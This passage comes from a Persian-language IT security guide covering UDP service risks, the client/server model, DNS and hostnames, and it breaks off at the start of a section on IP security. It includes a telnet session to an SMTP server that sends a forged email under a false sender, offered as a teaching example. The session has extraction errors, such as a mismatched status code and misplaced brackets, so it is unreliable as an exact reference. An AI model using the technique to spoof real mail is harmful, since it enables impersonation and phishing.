ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺷﺒﻜﻪ ) (NFSﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﻧﻴﺰ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﻫﻤﭽﻨﻴﻦ ﺍﺯ UDPﺩﺭ
ﻼ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺩﺭ ﻣﺪﺕ ﺯﻣﺎﻥ ﻛﻮﺗﺎﻫﻲ ﻳﻚ ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺯ ﻧﺮﺳﻴﺪﻥ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻳﻚ ﺑﺴﺘﻪ ﺗﺄﺛﻴﺮ ﻣﻨﻔﻲ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﭘﺬﻳﺮﻧﺪ -ﻣﺜ ﹰ
ﺑﺴﺘﺔ ﻣﺮﺗﺒﻂ ﺩﻳﮕﺮ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺎﺑﻪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺍﻫﻤﻴﺖ ﭼﻨﺪﺍﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ -ﻧﻴﺰ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ.
ﻫﻤﺎﻧﻨﺪ ،TCPﺑﺴﺘﻪﻫﺎﻱ UDPﻧﻴﺰ ﺍﺯ ﻳﻚ ﭘﻮﺭﺕ ﺩﺭ ﻣﻴﺰﺑﺎﻥ ﻓﺮﺳﺘﻨﺪﻩ ﺑﻪ ﻳﻚ ﭘﻮﺭﺕ ﺩﺭ ﻣﻴﺰﺑﺎﻥ ﮔﻴﺮﻧﺪﻩ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ .ﻫﺮ ﺑﺴﺘﺔ
UDPﻫﻤﭽﻨﻴﻦ ﻣﺤﺘﻮﻱ ﺩﺍﺩﻩﻫﺎﻱ ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﻫﺴﺖ .ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﻭﻱ ﺁﻥ ﭘﻮﺭﺕ ﺧﺎﺹ ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﺍﻳﺴﺘﺎﺩﻩ ﻭ ﺁﻣﺎﺩﺓ ﺩﺭﻳﺎﻓﺖ ﺑﺴﺘﻪ ﺑﺎﺷﺪ،
ﺑﺴﺘﻪ ﺩﺭﻳﺎﻓﺖ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﻭﻱ ﺁﻥ ﭘﻮﺭﺕ ﻣﻨﺘﻈﺮ ﺑﺴﺘﻪ ﻧﺒﺎﺷﺪ ،ﺑﻪ ﺑﺴﺘﻪ ﺗﻮﺟﻬﻲ ﻧﻤﻲﺷﻮﺩ ﻭ ﻣﻴﺰﺑﺎﻥ ﮔﻴﺮﻧﺪﺓ ﭘﻴﺎﻡ ﻳﻚ ﭘﻴﻐﺎﻡ
ﺧﻄﺎﻱ ICMPﻣﻲﻓﺮﺳﺘﺪ .ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺁﻥ ﭘﻮﺭﺕ ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﺑﺎﺷﺪ ﻭﻟﻲ ﺁﻣﺎﺩﮔﻲ ﺩﺭﻳﺎﻓﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺑﺴﺘﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻳﻚ ﺻﻒ ﺩﺭ ﻧﻮﺑﺖ ﺩﺭﻳﺎﻓﺖﺷﺪﻥ ﺑﺎﻗﻲ ﺑﻤﺎﻧﺪ ﺗﺎ ﻧﻬﺎﻳﺘﹰﺎ ﺩﺭﻳﺎﻓﺖ ﺷﻮﺩ ﻭ ﻳﺎ ﺍﺯ ﺩﺳﺖ ﺑﺮﻭﺩ.
ﺑﺮﺧﻼﻑ ﺑﺴﺘﻪﻫﺎﻱ ،TCPﻳﻚ ﺑﺴﺘﺔ UDPﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﺒﮑﻪﻫﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ﭘﺨﺶ ﻋﻤﻮﻣﻲ ﺷﻮﺩ ،ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ
ﻳﻚ ﭘﻮﺭﺕ ﺧﺎﺹ ﺭﻭﻱ ﻫﻤﺔ ﻣﻴﺰﺑﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺭﻭﻱ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻳﻜﺴﺎﻧﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ .ﺑﺴﺘﻪﻫﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺍﻱ
ﺧﺪﻣﺎﺗﻲ ﻣﺜﻞ ﺍﻋﻼﻡ ﺳﺎﻋﺖ ﺭﻭﺯ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﭘﻮﺭﺗﻬﺎ ﺑﺎ ﺍﻋﺪﺍﺩ ١٦ﺑﻴﺘﻲ ﻣﺸﺨﺺ ﻣﻲﺷﻮﻧﺪ .ﺟﺪﻭﻝ -٥ﺏ ﺑﺮﺧﻲ ﭘﻮﺭﺗﻬﺎﻱ ﻣﻨﺘﺴﺐ ﺑﻪ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺧﺪﻣﺎﺕ ﻣﻌﻤﻮﻝ UDPﺭﺍ ﻧﺸﺎﻥ
ﻣﻲﺩﻫﺪ .ﺩﺭ ﺧﺪﻣﺎﺕ UDPﻧﻴﺰ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻭ ﺿﻌﻔﻬﺎﻱ ﻗﺎﺑﻞ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﺸﺎﺑﻪ ﺟﺪﻭﻝ ﻗﺒﻠﻲ ،ﻧﻮﻉ ﻣﺨﺎﻃﺮﺓ ﻫﺮﻳﻚ
ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻣﻘﺎﺑﻠﺸﺎﻥ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺳﺘﻪﺑﻨﺪﻱ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﺪﻣﺎﺕ UDPﺑﻌﺒﺎﺭﺕ ﺯﻳﺮ ﺍﺳﺖ:
ﺍﻟﻒ .ﻣﻲﺗﻮﺍﻥ ﺳﺮﻭﻳﺲ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ ﻭ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﺁﻏﺎﺯ ﮐﺮﺩ؛
ﺏ .ﭘﺮﻭﺗﻜﻞ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻭ ﺑﺪﻭﻥ ﻫﻴﭽﮕﻮﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻨﺘﻘﻞ ﺷﻮﺩ؛ ﻭ
ﻻ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻛﻪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ IPﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ،ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﻣﻌﺮﺽ ﺗﻬﺪﻳﺪ ﺝ .ﺳﺮﻭﻳﺲ ﻣﻌﻤﻮ ﹰ
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻭ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻣﺸﺎﺑﻪ ﺣﻤﻼﺕ ﻣﻲﺑﺎﺷﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٠٠
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ
ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺳﺎﺱ ﻣﺪﻝ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ /ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺖ .ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ﺑﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ
ﺩﻳﮕﺮﻱ ﺑﻪ ﻧﺎﻡ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺗﺼﺎﻻﺗﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻧﻴﺰ ﻣﻨﺘﻈﺮ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻳﻦ ﺍﺗﺼﺎﻻﺕ
ﻫﺴﺘﻨﺪ .ﻳﻚ ﻧﻤﻮﻧﻪ ﺍﺯ ﻳﻚ ﺟﻔﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ /ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ،ﺳﻴﺴﺘﻢ ﺯﻣﺎﻥ ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ .ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ
ﻛﻪ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﺒﻜﻪ ،ﺯﻣﺎﻥ ﺭﺍ ﻣﻲﭘﺮﺳﺪ .ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣﻨﺘﻈﺮ ﺍﻳﻦ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺍﺳﺖ ﻭ ﺯﻣﺎﻥ
ﺻﺤﻴﺢ ﺭﺍ ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ .ﺩﺭ ﺩﻧﻴﺎﻱ ،Unixﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﻛﻪ ﺩﺭ ﭘﺲﺯﻣﻴﻨﻪ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻨﺘﻈﺮ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻛﺎﺭﺑﺮ
ﻫﺴﺘﻨﺪ ﺑﻪ daemonﻣﺸﻬﻮﺭﻧﺪ ﻭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ) serviceﺧﺪﻣﺖ( ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ.
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪ telnetﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻫﺮ ﭘﻮﺭﺕ ﺩﻟﺨﻮﺍﻩ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻣﺘﺼﻞ ﺷﻮﻳﺪ ٢٩٢.ﻣﺜ ﹰ
ﻼ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﻮﺭﺕ ) ٢٥ﭘﻮﺭﺕ (SMTP
ﻣﺘﺼﻞ ﺷﻮﻳﺪ ﺗﺎ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ،ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻌﻠﻲ ﺑﻔﺮﺳﺘﻴﺪ:
% telnet control.mil 25
Trying 45.1.12.2 ...
Connected to hq.control.mil.
Escape character is '^]'.
220 hq.control.mil ESMTP Sendmail 8.11.6/8.11.6; Sun, 18 Aug 2002 21:21:03 –0500
HELO kaos.org
250 hq.control.mil Hello kaos.org, pleased to meet you
>MAIL FROM:<agent86@control.mil
250 <agent86>... Sender ok
>RCPT TO:<agent99@control.mil
550 <agent99>... Recipient ok
DATA
354 Enter mail, end with “.” on a line by itself
To: agent99
>From: Max <agent86
Subject: tonight
99, I know I was supposed to take you out to dinner tonight, but I have been captured by KAOS
agents, and they
won't let me out until they finish torturing me. I hope you understand. Love, Max
.
250 UAA01441 Message accepted for delivery
QUIT
ﺑﺨﺶ ﭘﻨﺠﻢ
"ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ" ﻧﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ .ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺁﺳﺎﻧﺘﺮ
ﻣﻲﺳﺎﺯﺩ ،ﭼﺮﺍﻛﻪ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺁﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ IPﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺁﺩﺭﺱ IPﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩ ﺍﻣﺎ ﻧﺎﻡ
ﻣﻴﺰﺑﺎﻥ ﺁﻧﺮﺍ ﺑﻪ ﻫﻤﺎﻥ ﻧﺎﻡ ﻗﺒﻠﻲ ﺑﺎﻗﻲ ﮔﺬﺍﺷﺖ .ﻳﻚ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ IPﺗﻌﻠﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﻳﻚ ﺁﺩﺭﺱ IP
ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺍﻳﻦ ﺩﻭ ﻣﻮﺭﺩ ﺑﺮ ﻛﺎﺭ ﻛﺴﺎﻧﻴﻜﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﺍﻳﻤﻦ ﺑﻨﻮﻳﺴﻨﺪ ﺗﺄﺛﻴﺮﺍﺕ
ﻋﻤﻴﻘﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ.
۲۹۲ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﻤﻨﻈﻮﺭ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻜﺎﺭ ﻣﻲﺭﻓﺖ ،ﻭﻟﻲ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﺭﻣﺰﻧﺸﺪﻩ ﻣﻲﻓﺮﺳﺘﺪ ،ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩ telnetﺩﻳﮕﺮ ﺑﻬﻴﭽﻮﺟـﻪ
ﺗﻮﺻﻴﻪ ﻧﻤﻲﺷﻮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٠٢
ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﺎﻳﺪ ﺑﺎ ﻳﻚ ﺣﺮﻑ ﻳﺎ ﻳﻚ ﺷﻤﺎﺭﻩ ﺁﻏﺎﺯ ﺷﻮﺩ ﻭ ﺩﺭ ﺍﺩﺍﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﺣﺮﻭﻑ ،ﺷﻤﺎﺭﻩ ﻭ ﻳﺎ ﺑﺮﺧﻲ ﻧﻤﺎﺩﻫﺎ ﻫﻤﭽﻮﻥ ﺧﻂ ﻓﺎﺻﻠﻪ
٢٩٣
ﺑﺎﺷﺪ .ﺣﺮﻭﻑ ﻛﻮﭼﻚ ﻭ ﺑﺰﺭﮒ ﺩﺭ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﻔﺎﻭﺗﻲ ﻧﺪﺍﺭﻧﺪ .ﻣﺜﺎﻟﻲ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ tock.cerias.purdue.edu
٢٩٤
ﺍﺳﺖ.
ﻫﺮ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺯ ﺩﻭ ﺑﺨﺶ ﺗﺸﻜﻴﻞ ﺷﺪﻩ :ﻧﺎﻡ ﺭﺍﻳﺎﻧﻪ ،ﻭ ﻧﺎﻡ ﺩﺍﻣﻨﺔ ﺁﻥ .ﻧﺎﻡ ﺭﺍﻳﺎﻧﻪ ﺍﺳﻤﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻤﺖ ﭼﭗ ﻧﻘﻄﺔ ﺍﻭﻝ ﺍﺳﺖ؛ ﻭ ﻧﺎﻡ
ﺩﺍﻣﻨﻪ ﻧﻴﺰ ﻫﻤﺔ ﺁﻥ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻤﺖ ﺭﺍﺳﺖ ﺁﻥ ﻧﻘﻄﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﺑﺮﺍﻱ ﻧﻤﻮﻧﻪ ﺩﺭ ﻣﺜﺎﻝ ﻗﺒﻞ ﻧﺎﻡ ﺭﺍﻳﺎﻧﻪ tockﻭ ﻧﺎﻡ ﺩﺍﻣﻨﺔ ﺁﻥ
cerias.purdue.eduﺍﺳﺖ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﺧﻮﺩ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﻧﻘﻄﻪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺁﻥ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺳﻠﺴﻠﻪﻣﺮﺍﺗﺒﻲ ﺍﺯ ﺩﺍﻣﻨﻪﻫﺎ
ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ cerias.purdue.eduﻣﻌﺮﻑ ﺩﺍﻣﻨﺔ ﻣﺮﻛﺰ CERIASﺍﺳﺖ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﺩﺍﻣﻨﺔ ﺩﺍﻧﺸﮕﺎﻩ Purdueﺭﺍ
ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﺪ ،ﻭ ﺑﻪ ﻧﻮﺑﺔ ﺧﻮﺩ ﺑﺨﺸﻲ ﺍﺯ ﺩﺍﻣﻨﺔ ﺳﻄﺢ ﺑﺎﻻﺗﺮ ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ ) (eduﻣﻲﺑﺎﺷﺪ.
ﺩﺭ ﺁﻏﺎﺯ ﭘﻴﺪﺍﻳﺶ ﺍﻳﻨﺘﺮﻧﺖ ،ﻫﻤﺔ ﻧﺎﻣﻬﺎ ﻭ ﺁﺩﺭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﻭﺍﺣﺪ ﺑﻮﺩ .ﺍﻣﺎ ﺑﺎ ﺑﺰﺭﮒ ﺷﺪﻥ ﺍﻧﺪﺍﺯﺓ ﻓﺎﻳﻞ ﺑﻪ ﻫﺰﺍﺭﺍﻥ
ﻼ ﻏﻴﺮﻣﻤﻜﻦ ﺷﺪ ﻭ ﺑﺠﺎﻱ ﺁﻥ ﻳﻚ ﺧﻂ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻐﻴﻴﺮ ﺩﺭ ﻓﻬﺮﺳﺖ ﻧﺎﻣﻬﺎ ﻛﻢ ﻛﻢ ﺑﻪ ﺍﻣﺮﻱ ﺭﻭﺯﺍﻧﻪ ﺗﺒﺪﻳﻞ ﺷﺪ ،ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺁﻥ ﻋﻤ ﹰ
ﺳﺮﻭﻳﺲ ﺗﻮﺯﻳﻊﺷﺪﺓ ﻧﺎﻡ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﻛﻪ ﺧﺪﻣﺎﺕ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ) (DNSﻧﺎﻡ ﮔﺮﻓﺖ.
ﺩﺭ ،DNSﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﺮﺍﻱ ﺗﺮﺟﻤﺔ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﺁﺩﺭﺱ IPﻭ ﺑﺎﻟﻌﻜﺲ ﻭ ﺍﻧﺠﺎﻡ ﺍﻋﻤﺎﻝ ﻣﺮﺑﻮﻃﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ.
ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﺗﺮﺟﻤﺔ ﻫﺮ ﺑﺨﺶ ﺍﺯ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ،ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﻄﻮﺭ ﻣﺠﺰﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ
ﺗﺮﺟﻤﺔ ﻧﺎﻡ girigiri.gbrmpa.gov.auﺍﺑﺘﺪﺍ ﺁﺩﺭﺱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﻧﺎﻡ )ﻛﻪ ﻣﻌﻤﻮ ﹰﻻ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺫﺧﻴﺮﻩ ﺷﺪﻩ( ﺭﺍ ﻣﻲﺟﻮﻳﺪ ﻭ ﺍﺯ
ﺁﻥ ﺁﺩﺭﺱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺩﺍﻣﻨﺔ ﺳﻄﺢ ﺑﺎﻻﻱ auﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨﺪ .ﺳﭙﺲ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﺩﺍﻣﻨﺔ auﺩﺭ ﻣﻮﺭﺩ ﺁﺩﺭﺱ
gov.auﺳﺆﺍﻝ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ،ﺁﺩﺭﺱ gbrmpa.gov.auﺭﺍ ﺍﺯ ﺁﻥ ﻣﻲﭘﺮﺳﺪ ،ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺩﺍﻣﻨﺔ
gbrmpa.gov.auﺁﺩﺭﺱ ﺭﺍﻳﺎﻧﺔ girigiri.gbrmpa.gov.auﺭﺍ ﺟﻮﻳﺎ ﻣﻲﺷﻮﺩ .ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺗﺮﺟﻤﺔ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺑﻪ ﺁﺩﺭﺱ ،IPﺍﻧﻮﺍﻉ
ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻱ cachingﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺗﺮﺍﻓﻴﻚ ﻛﻠﻲ ﺷﺒﻜﻪ ﻧﻴﺰ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ.
ﻻ ﺑﻮﺳﻴﻠﺔ ﺑﺴﺘﻪﻫﺎﻱ UDPﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ ،ﺍﻣﺎ DNSﺑﺮﺍﻱ ﺑﻌﻀﻲ ﺍﺯ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺩ ﺍﺯ
ﺟﺴﺘﺠﻮﻫﺎﻱ DNSﺑﺪﻧﺒﺎﻝ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻣﻌﻤﻮ ﹰ
TCPﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ.
ﺍﻣﻨﻴﺖ IP
ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﭘﺮﻭﺗﻜﻞ IPﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺍﺯ ﺟﻤﻠﻪ ﺣﺪﺱ ﺯﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ،ﺍﺷﻜﺎﻻﺕ
